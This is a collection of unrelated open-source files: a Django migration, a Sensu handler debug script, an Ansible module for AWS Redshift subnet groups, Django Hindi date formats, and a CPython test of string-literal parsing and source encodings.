WebCampZg/conference-web | refs/heads/master | cfp/migrations/0012_auto_20170523_1411.py | 1 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-23 12:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cfp', '0011_auto_20170523_1353'),
]
operations = [
migrations.AlterField(
model_name='paperapplication',
name='about',
field=models.TextField(help_text='Describe your talk in 140 characters or less. Plain text only. [Public]', verbose_name="What's it about"),
),
migrations.AlterField(
model_name='paperapplication',
name='abstract',
field=models.TextField(help_text='You may go in more depth here. Up to 10 sentnces, use Markdown. [Public]', verbose_name='Abstract'),
),
]
|
davemcphee/sensu-pager-handler | refs/heads/master | python-handler/test_handler.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# run this on sensu server to check what kind of output we get fed from main proc
import logging
logging.basicConfig(level=logging.DEBUG)
import os
import sys
LOG = logging.getLogger(__name__)
what_i_got = sys.argv
LOG.debug("argsv\t\t{}".format(str(what_i_got)))
LOG.debug("join\t\t{}".format(' '.join(what_i_got)))
|
caveman-dick/ansible | refs/heads/devel | lib/ansible/modules/cloud/amazon/redshift_subnet_group.py | 24 | #!/usr/bin/python
# Copyright 2014 Jens Carl, Hothead Games Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
author:
- "Jens Carl (@j-carl), Hothead Games Inc."
module: redshift_subnet_group
version_added: "2.2"
short_description: mange Redshift cluster subnet groups
description:
- Create, modifies, and deletes Redshift cluster subnet groups.
options:
state:
description:
- Specifies whether the subnet should be present or absent.
default: 'present'
choices: ['present', 'absent' ]
group_name:
description:
- Cluster subnet group name.
required: true
aliases: ['name']
group_description:
description:
- Database subnet group description.
required: false
default: null
aliases: ['description']
group_subnets:
description:
- List of subnet IDs that make up the cluster subnet group.
required: false
default: null
aliases: ['subnets']
requirements: [ 'boto' ]
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Create a Redshift subnet group
- local_action:
module: redshift_subnet_group
state: present
group_name: redshift-subnet
group_description: Redshift subnet
group_subnets:
- 'subnet-aaaaa'
- 'subnet-bbbbb'
# Remove subnet group
- redshift_subnet_group:
state: absent
group_name: redshift-subnet
'''
RETURN = '''
group:
description: dictionary containing all Redshift subnet group information
returned: success
type: complex
contains:
name:
description: name of the Redshift subnet group
returned: success
type: string
sample: "redshift_subnet_group_name"
vpc_id:
description: Id of the VPC where the subnet is located
returned: success
type: string
sample: "vpc-aabb1122"
'''
try:
import boto
import boto.redshift
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
group_name=dict(required=True, aliases=['name']),
group_description=dict(required=False, aliases=['description']),
group_subnets=dict(required=False, aliases=['subnets'], type='list'),
))
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto v2.9.0+ required for this module')
state = module.params.get('state')
group_name = module.params.get('group_name')
group_description = module.params.get('group_description')
group_subnets = module.params.get('group_subnets')
if state == 'present':
for required in ('group_name', 'group_description', 'group_subnets'):
if not module.params.get(required):
module.fail_json(msg=str("parameter %s required for state='present'" % required))
else:
for not_allowed in ('group_description', 'group_subnets'):
if module.params.get(not_allowed):
module.fail_json(msg=str("parameter %s not allowed for state='absent'" % not_allowed))
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg=str("region not specified and unable to determine region from EC2_REGION."))
# Connect to the Redshift endpoint.
try:
conn = connect_to_aws(boto.redshift, region, **aws_connect_params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
changed = False
exists = False
group = None
try:
matching_groups = conn.describe_cluster_subnet_groups(group_name, max_records=100)
exists = len(matching_groups) > 0
except boto.exception.JSONResponseError as e:
if e.body['Error']['Code'] != 'ClusterSubnetGroupNotFoundFault':
# if e.code != 'ClusterSubnetGroupNotFoundFault':
module.fail_json(msg=str(e))
if state == 'absent':
if exists:
conn.delete_cluster_subnet_group(group_name)
changed = True
else:
if not exists:
new_group = conn.create_cluster_subnet_group(group_name, group_description, group_subnets)
group = {
'name': new_group['CreateClusterSubnetGroupResponse']['CreateClusterSubnetGroupResult']
['ClusterSubnetGroup']['ClusterSubnetGroupName'],
'vpc_id': new_group['CreateClusterSubnetGroupResponse']['CreateClusterSubnetGroupResult']
['ClusterSubnetGroup']['VpcId'],
}
else:
changed_group = conn.modify_cluster_subnet_group(group_name, group_subnets, description=group_description)
group = {
'name': changed_group['ModifyClusterSubnetGroupResponse']['ModifyClusterSubnetGroupResult']
['ClusterSubnetGroup']['ClusterSubnetGroupName'],
'vpc_id': changed_group['ModifyClusterSubnetGroupResponse']['ModifyClusterSubnetGroupResult']
['ClusterSubnetGroup']['VpcId'],
}
changed = True
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
module.exit_json(changed=changed, group=group)
if __name__ == '__main__':
main()
|
darkryder/django | refs/heads/master | django/conf/locale/hi/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'g:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'd-m-Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
# NUMBER_GROUPING =
|
unseenlaser/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/test_strlit.py | 48 | r"""Test correct treatment of various string literals by the parser.
There are four types of string literals:
'abc' -- normal str
r'abc' -- raw str
b'xyz' -- normal bytes
br'xyz' -- raw bytes
The difference between normal and raw strings is of course that in a
raw string, \ escapes (while still used to determine the end of the
literal) are not interpreted, so that r'\x00' contains four
characters: a backslash, an x, and two zeros; while '\x00' contains a
single character (code point zero).
The tricky thing is what should happen when non-ASCII bytes are used
inside literals. For bytes literals, this is considered illegal. But
for str literals, those bytes are supposed to be decoded using the
encoding declared for the file (UTF-8 by default).
We have to test this with various file encodings. We also test it with
exec()/eval(), which uses a different code path.
This file is really about correct treatment of encodings and
backslashes. It doesn't concern itself with issues like single
vs. double quotes or singly- vs. triply-quoted strings: that's dealt
with elsewhere (I assume).
"""
import os
import sys
import shutil
import tempfile
import unittest
TEMPLATE = r"""# coding: %s
a = 'x'
assert ord(a) == 120
b = '\x01'
assert ord(b) == 1
c = r'\x01'
assert list(map(ord, c)) == [92, 120, 48, 49]
d = '\x81'
assert ord(d) == 0x81
e = r'\x81'
assert list(map(ord, e)) == [92, 120, 56, 49]
f = '\u1881'
assert ord(f) == 0x1881
g = r'\u1881'
assert list(map(ord, g)) == [92, 117, 49, 56, 56, 49]
"""
def byte(i):
return bytes([i])
class TestLiterals(unittest.TestCase):
def setUp(self):
self.save_path = sys.path[:]
self.tmpdir = tempfile.mkdtemp()
sys.path.insert(0, self.tmpdir)
def tearDown(self):
sys.path = self.save_path
shutil.rmtree(self.tmpdir, ignore_errors=True)
def test_template(self):
# Check that the template doesn't contain any non-printables
# except for \n.
for c in TEMPLATE:
assert c == '\n' or ' ' <= c <= '~', repr(c)
def test_eval_str_normal(self):
self.assertEqual(eval(""" 'x' """), 'x')
self.assertEqual(eval(r""" '\x01' """), chr(1))
self.assertEqual(eval(""" '\x01' """), chr(1))
self.assertEqual(eval(r""" '\x81' """), chr(0x81))
self.assertEqual(eval(""" '\x81' """), chr(0x81))
self.assertEqual(eval(r""" '\u1881' """), chr(0x1881))
self.assertEqual(eval(""" '\u1881' """), chr(0x1881))
def test_eval_str_raw(self):
self.assertEqual(eval(""" r'x' """), 'x')
self.assertEqual(eval(r""" r'\x01' """), '\\' + 'x01')
self.assertEqual(eval(""" r'\x01' """), chr(1))
self.assertEqual(eval(r""" r'\x81' """), '\\' + 'x81')
self.assertEqual(eval(""" r'\x81' """), chr(0x81))
self.assertEqual(eval(r""" r'\u1881' """), '\\' + 'u1881')
self.assertEqual(eval(""" r'\u1881' """), chr(0x1881))
def test_eval_bytes_normal(self):
self.assertEqual(eval(""" b'x' """), b'x')
self.assertEqual(eval(r""" b'\x01' """), byte(1))
self.assertEqual(eval(""" b'\x01' """), byte(1))
self.assertEqual(eval(r""" b'\x81' """), byte(0x81))
self.assertRaises(SyntaxError, eval, """ b'\x81' """)
self.assertEqual(eval(r""" b'\u1881' """), b'\\' + b'u1881')
self.assertRaises(SyntaxError, eval, """ b'\u1881' """)
def test_eval_bytes_raw(self):
self.assertEqual(eval(""" br'x' """), b'x')
self.assertEqual(eval(r""" br'\x01' """), b'\\' + b'x01')
self.assertEqual(eval(""" br'\x01' """), byte(1))
self.assertEqual(eval(r""" br'\x81' """), b"\\" + b"x81")
self.assertRaises(SyntaxError, eval, """ br'\x81' """)
self.assertEqual(eval(r""" br'\u1881' """), b"\\" + b"u1881")
self.assertRaises(SyntaxError, eval, """ br'\u1881' """)
def check_encoding(self, encoding, extra=""):
modname = "xx_" + encoding.replace("-", "_")
fn = os.path.join(self.tmpdir, modname + ".py")
f = open(fn, "w", encoding=encoding)
try:
f.write(TEMPLATE % encoding)
f.write(extra)
finally:
f.close()
__import__(modname)
del sys.modules[modname]
def test_file_utf_8(self):
extra = "z = '\u1234'; assert ord(z) == 0x1234\n"
self.check_encoding("utf-8", extra)
def test_file_utf_8_error(self):
extra = "b'\x80'\n"
self.assertRaises(SyntaxError, self.check_encoding, "utf-8", extra)
def test_file_utf8(self):
self.check_encoding("utf8")
def test_file_iso_8859_1(self):
self.check_encoding("iso-8859-1")
def test_file_latin_1(self):
self.check_encoding("latin-1")
def test_file_latin9(self):
self.check_encoding("latin9")
if __name__ == "__main__":
# Hack so that error messages containing non-ASCII can be printed
sys.stdout._encoding = sys.stderr._encoding = "utf-8"
unittest.main()
|
Subsets and Splits